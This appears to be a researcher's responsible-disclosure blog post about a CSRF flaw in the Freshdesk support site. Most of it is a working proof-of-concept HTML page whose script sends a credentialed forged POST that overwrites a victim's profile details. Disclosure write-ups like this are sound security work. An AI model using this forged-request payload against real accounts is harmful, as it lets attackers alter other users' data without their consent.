I was able to find out few web application related security issues in the Freshdesk website. They had a responsible disclosure policy, so I was able to report them. http://freshdesk.com/security
The application did not have proper CSRF tokens used. Any arbitrary user could change account information of other users.
<html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://exploit.freshdesk.com/support/profile", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------273522544628602"); xhr.withCredentials = true; var body = "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"_method\"\r\n" + "\r\n" + "put\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[avatar_attributes][content]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[name]\"\r\n" + "\r\n" + "haxor\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[job_title]\"\r\n" + "\r\n" + "haxor\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[phone]\"\r\n" + "\r\n" + "12345678904\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[mobile]\"\r\n" + "\r\n" + "7894561233\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[twitter_id]\"\r\n" + "\r\n" + "@exfdsfdsf\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[time_zone]\"\r\n" + "\r\n" + "sesdsds\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"user[language]\"\r\n" + "\r\n" + "en\r\n" + "-----------------------------273522544628602\r\n" + "Content-Disposition: form-data; name=\"commit\"\r\n" + "\r\n" + "Save Changes\r\n" + "-----------------------------273522544628602--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>